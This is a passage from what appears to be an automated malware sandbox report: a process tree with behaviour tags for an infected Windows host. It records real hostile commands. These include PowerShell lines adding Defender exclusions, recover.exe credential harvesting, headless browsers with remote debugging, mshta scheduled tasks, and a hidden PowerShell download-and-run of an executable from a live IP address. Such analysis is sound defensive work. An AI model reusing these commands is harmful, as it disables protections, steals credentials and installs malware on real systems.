        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '*.vbe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2080
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension *.vbe
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6608
        
        C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:4200
        
        C:\Program Files\Google\Chrome\Application\Chrome.exe
        
        --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default"
        13⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:6912
        
        C:\Program Files\Google\Chrome\Application\Chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffdce4dcf8,0x7fffdce4dd04,0x7fffdce4dd10
        14⤵
        
        PID:6980
        
        C:\Program Files\Google\Chrome\Application\Chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1932,i,16582367969533458919,11361406366475292006,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1924 /prefetch:2
        14⤵
        
        PID:5604
        
        C:\Program Files\Google\Chrome\Application\Chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --field-trial-handle=2184,i,16582367969533458919,11361406366475292006,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2180 /prefetch:3
        14⤵
        
        PID:6260
        
        C:\Program Files\Google\Chrome\Application\Chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --field-trial-handle=2316,i,16582367969533458919,11361406366475292006,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2312 /prefetch:8
        14⤵
        
        PID:7116
        
        C:\Program Files\Google\Chrome\Application\Chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-databases --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3180,i,16582367969533458919,11361406366475292006,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3176 /prefetch:1
        14⤵
        Uses browser remote debugging
        
        PID:7424
        
        C:\Program Files\Google\Chrome\Application\Chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --string-annotations --noerrdialogs --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --disable-databases --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3212,i,16582367969533458919,11361406366475292006,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3208 /prefetch:1
        14⤵
        Uses browser remote debugging
        
        PID:7432
        
        C:\Program Files\Google\Chrome\Application\Chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --field-trial-handle=4164,i,16582367969533458919,11361406366475292006,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4252 /prefetch:8
        14⤵
        
        PID:8140
        
        C:\Windows\SysWOW64\recover.exe
        
        C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\rocqthuzqjjmeanaurhqcjlpxvhkbgh"
        13⤵
        
        PID:7140
        
        C:\Windows\SysWOW64\recover.exe
        
        C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\rocqthuzqjjmeanaurhqcjlpxvhkbgh"
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:4588
        
        C:\Windows\SysWOW64\recover.exe
        
        C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\bqia"
        13⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:4672
        
        C:\Windows\SysWOW64\recover.exe
        
        C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\ekntvsq"
        13⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:6388
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default"
        13⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Modifies registry class
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:5392
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x24c,0x7fffd73df208,0x7fffd73df214,0x7fffd73df220
        14⤵
        
        PID:5880
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=2156,i,4617777052649798970,1692323759195790362,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:3
        14⤵
        
        PID:3728
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2116,i,4617777052649798970,1692323759195790362,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2108 /prefetch:2
        14⤵
        
        PID:5328
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=2492,i,4617777052649798970,1692323759195790362,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2484 /prefetch:8
        14⤵
        
        PID:7084
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --instant-process --pdf-upsell-enabled --remote-debugging-port=9222 --disable-databases --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3584,i,4617777052649798970,1692323759195790362,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:1
        14⤵
        Uses browser remote debugging
        
        PID:5720
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --pdf-upsell-enabled --remote-debugging-port=9222 --disable-databases --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4272,i,4617777052649798970,1692323759195790362,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4268 /prefetch:1
        14⤵
        Uses browser remote debugging
        
        PID:6436
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=4656,i,4617777052649798970,1692323759195790362,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4232 /prefetch:8
        14⤵
        
        PID:8136
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=4796,i,4617777052649798970,1692323759195790362,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4628 /prefetch:8
        14⤵
        
        PID:5936
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=4768,i,4617777052649798970,1692323759195790362,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4764 /prefetch:8
        14⤵
        
        PID:1112
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=5548,i,4617777052649798970,1692323759195790362,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5544 /prefetch:8
        14⤵
        
        PID:8128
        
        C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=5548,i,4617777052649798970,1692323759195790362,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5544 /prefetch:8
        14⤵
        
        PID:4968
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=5476,i,4617777052649798970,1692323759195790362,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5612 /prefetch:8
        14⤵
        
        PID:7876
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=5724,i,4617777052649798970,1692323759195790362,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:8
        14⤵
        
        PID:7208
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=5916,i,4617777052649798970,1692323759195790362,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5636 /prefetch:8
        14⤵
        
        PID:7608
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --always-read-main-dll --field-trial-handle=5736,i,4617777052649798970,1692323759195790362,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5740 /prefetch:8
        14⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ipconfig /renew
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:5236
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /renew
        11⤵
        Gathers network information
        
        PID:948
        
        C:\Users\Admin\AppData\Local\Temp\VLPDrivers.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VLPDrivers.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:1728
        
        C:\Users\Admin\AppData\Local\Temp\XtDrivers.exe
        
        "C:\Users\Admin\AppData\Local\Temp\XtDrivers.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Modifies registry class
        
        PID:5772
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\etod.vbe"
        9⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:4900
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ipconfig /release
        10⤵
        
        PID:736
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /release
        11⤵
        Gathers network information
        
        PID:1584
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sbasnekg.exe mian.docx
        10⤵
        
        PID:1900
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\sbasnekg.exe
        
        sbasnekg.exe mian.docx
        11⤵
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5604
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\RarSFX0
        12⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionProcess 'RegSvcs.exe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RegSvcs.exe
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbs'
        12⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4752
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension .vbs
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6524
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '.vbe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2928
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension .vbe
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:6788
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '*.vbs'
        12⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:5624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension *.vbs
        13⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:6616
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" powershell -Command Add-MpPreference -ExclusionExtension '*.vbe'
        12⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:4580
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionExtension *.vbe
        13⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:6584
        
        C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RegSvcs.exe"
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious use of AdjustPrivilegeToken
        
        PID:32
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c ipconfig /renew
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:5012
        
        C:\Windows\SysWOW64\ipconfig.exe
        
        ipconfig /renew
        11⤵
        Gathers network information
        
        PID:4828
        
        C:\Users\Admin\AppData\Local\Temp\10034600101\c0355d9ef7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10034600101\c0355d9ef7.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:4668
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10034600101\c0355d9ef7.exe"
        8⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4768
        
        C:\Users\Admin\AppData\Local\Temp\10034610101\feb0b1ca26.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10034610101\feb0b1ca26.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:1524
    - - C:\Users\Admin\AppData\Local\Temp\10285330101\1177e54c4b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10285330101\1177e54c4b.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:5356
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn uoG5nmac7dz /tr "mshta C:\Users\Admin\AppData\Local\Temp\GUuinpRAq.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4356
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn uoG5nmac7dz /tr "mshta C:\Users\Admin\AppData\Local\Temp\GUuinpRAq.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:6020
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\GUuinpRAq.hta
        6⤵
        Checks computer location settings
        Suspicious use of WriteProcessMemory
        
        PID:5944
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'W8VK0EB6ZLWNVWYGZNRA2XZTMPLZREHL.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:940
        
        C:\Users\Admin\AppData\Local\TempW8VK0EB6ZLWNVWYGZNRA2XZTMPLZREHL.EXE
        
        "C:\Users\Admin\AppData\Local\TempW8VK0EB6ZLWNVWYGZNRA2XZTMPLZREHL.EXE"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:2428
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10285340121\am_no.cmd" "
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3244
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        6⤵
        Delays execution with timeout.exe
        
        PID:2128
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:840
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2976
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4112
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        7⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4200
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4988
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4972
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "sdCR5maZHzC" /tr "mshta \"C:\Temp\rwOTKWyNt.hta\"" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5896
      - C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\rwOTKWyNt.hta"
        6⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:1216
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4128
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4196
    - - C:\Users\Admin\AppData\Local\Temp\10285550101\qNEBT6e.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10285550101\qNEBT6e.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5644
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3772
    - - C:\Users\Admin\AppData\Local\Temp\10285600101\cidQ6US.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10285600101\cidQ6US.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5356
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6004
    - - C:\Users\Admin\AppData\Local\Temp\10285620101\oFkpQ36.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10285620101\oFkpQ36.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4072
